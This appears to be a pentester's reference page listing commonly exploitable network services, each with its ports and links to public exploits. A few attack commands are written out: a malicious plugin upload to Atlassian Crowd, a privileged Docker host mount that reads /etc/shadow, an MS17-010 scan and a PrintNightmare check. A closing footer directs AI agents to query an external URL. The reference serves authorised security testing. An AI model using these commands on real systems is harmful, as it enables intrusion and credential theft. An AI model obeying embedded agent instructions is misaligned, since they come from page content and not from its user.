# Low-Hanging Fruit

## Services

### Adobe ColdFusion BlazeDS

**Ports:** 8080\
**Exploit:**

{% embed url="<https://www.tenable.com/plugins/nessus/99731>" %}

{% embed url="<https://www.exploit-db.com/exploits/43993>" %}

### Apache Flink

**Ports:** 5000\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/multi/http/apache_flink_jar_upload_exec>" %}

{% embed url="<https://www.rapid7.com/db/modules/auxiliary/scanner/http/apache_flink_jobmanager_traversal>" %}

{% embed url="<https://www.exploit-db.com/exploits/48978>" %}

### Apache Hadoop

**Ports:** 8088\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/linux/http/hadoop_unauth_exec>" %}

{% embed url="<https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py>" %}

### Apache Solr

**Ports:** 8983\
**Exploit:**

{% embed url="<https://github.com/jas502n/solr_rce>" %}

{% embed url="<https://github.com/Imanfeng/Apache-Solr-RCE>" %}

### Apache Spark

**Ports:** 6066\
**Exploit:**

{% embed url="<https://github.com/ivanitlearning/CVE-2018-11770>" %}

{% embed url="<https://www.rapid7.com/db/modules/exploit/linux/http/spark_unauth_rce>" %}

### Atlassian Crowd

**Ports:** 4990\
**Exploit:**

```bash
curl -k -H "Content-Type: multipart/mixed" \ --form "file_cdl=@rce.jar" http://[HOST]:4990/crowd/admin/uploadplugin.action
```

{% embed url="<https://packetstormsecurity.com/files/163810/Atlassian-Crowd-pdkinstall-Remote-Code-Execution.html>" %}

### Cisco Smart Install

**Ports:** 4786\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/auxiliary/scanner/misc/cisco_smart_install>" %}

{% embed url="<https://github.com/frostbits-security/SIET>" %}

### Cisco Unified Communications Manager

**Ports:** 6970\
**Exploit:**

```bash
curl http://[CUCM IP Address]:6970/ConfigFileCacheList.txt
```

{% embed url="<https://github.com/trustedsec/SeeYouCM-Thief>" %}

### Dameware

**Ports:** 6129\
**Exploit:**

{% embed url="<https://www.tenable.com/security/research/tra-2019-43>" %}

{% embed url="<https://github.com/tenable/poc/blob/master/Solarwinds/Dameware/dwrcs_dwDrvInst_rce.py>" %}

### Dell iDrac&#x20;

**Ports:** 443

**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/auxiliary/scanner/http/dell_idrac>" %}

### Docker API

**Ports:** 2375\
**Exploit:**

```bash
docker -H [host]:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
```

* File Access: `cat /mnt/etc/shadow`
* Remote Code Execution: `chroot /mnt`

### GlassFish

**Ports:** 4848\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/auxiliary/scanner/http/glassfish_traversal>" %}

### Hashicorp Consul

**Ports:** 8500\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/multi/misc/consul_service_exec>" %}

### HP Data Protector

**Ports:** 5555, 5556\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/multi/misc/hp_data_protector_exec_integutil>" %}

{% embed url="<https://www.rapid7.com/db/modules/exploit/windows/misc/hp_dataprotector_cmd_exec>" %}

### HP iLO

**Ports:** 80, 443

**Exploit:**

{% embed url="<https://github.com/skelsec/CVE-2017-12542/blob/master/exploit_1.py>" %}

### IBM Websphere

**Ports:** 8880\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/windows/misc/ibm_websphere_java_deserialize>" %}

### IPMI

**Ports:** 623\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_version>" %}

{% embed url="<https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_dumphashes>" %}

{% embed url="<https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero>" %}

### Java RMI

**Ports:** 1090, 1098, 1099, 4444, 11099, 47001, 47002, 10999\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server>" %}

{% embed url="<https://itnext.io/java-rmi-for-pentesters-structure-recon-and-communication-non-jmx-registries-a10d5c996a79>" %}

{% embed url="<https://itnext.io/java-rmi-for-pentesters-part-two-reconnaissance-attack-against-non-jmx-registries-187a6561314d>" %}

### JBoss

**Ports:** 4444, 4445, 11111\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/auxiliary/scanner/http/jboss_vulnscan>" %}

{% embed url="<https://github.com/joaomatosf/jexboss>" %}

### JDWP

**Ports:** 5005 - 5009, 45000, 45001\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/multi/misc/java_jdwp_debugger>" %}

{% embed url="<https://github.com/IOActive/jdwp-shellifier>" %}

### JMX

**Ports:** 8686, 9012, 50500\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/multi/misc/java_jmx_server>" %}

### MS17-010: Eternal Blue

**Ports** 139, 445

**Exploit:**

```bash
nmap -Pn -sV --script smb-vuln-ms17-010 -p139,445 $ip 
```

{% embed url="<https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/>" %}

### Portainer

**Ports:** 9000\
**Exploit:**

{% embed url="<https://github.com/MauroEldritch/PAZUZU>" %}

{% embed url="<https://github.com/MauroEldritch/lempo>" %}

### PrintNightmare

```bash
crackmapexec smb $host_file -u $username -p $password -M spooler
```

{% embed url="<https://github.com/cube0x0/CVE-2021-1675>" %}

### Redis

**Ports:** 6379\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/linux/redis/redis_replication_cmd_exec>" %}

{% embed url="<https://www.rapid7.com/db/modules/exploit/linux/redis/redis_unauth_exec>" %}

### SAP

**Ports:** 3300\
**Exploit:**

{% embed url="<https://github.com/chipik/SAP_GW_RCE_exploit>" %}

### WebLogic

**Ports:** 7000-7004, 7070, 7071, 8000-8003, 9000-9003, 9503\
**Exploit:**

{% embed url="<https://www.exploit-db.com/search?q=weblogic>" %}

### Zoho Manageengine Desktop

**Ports:** 8383\
**Exploit:**

{% embed url="<https://srcincite.io/pocs/src-2020-0011.py.txt>" %}

### References

{% embed url="<https://github.com/trustedsec/spoonmap>" %}

{% embed url="<https://twitter.com/ptswarm/status/1354417582070247426>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ttp.parzival.sh/pentesting/infrastructure/easy_hacks.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.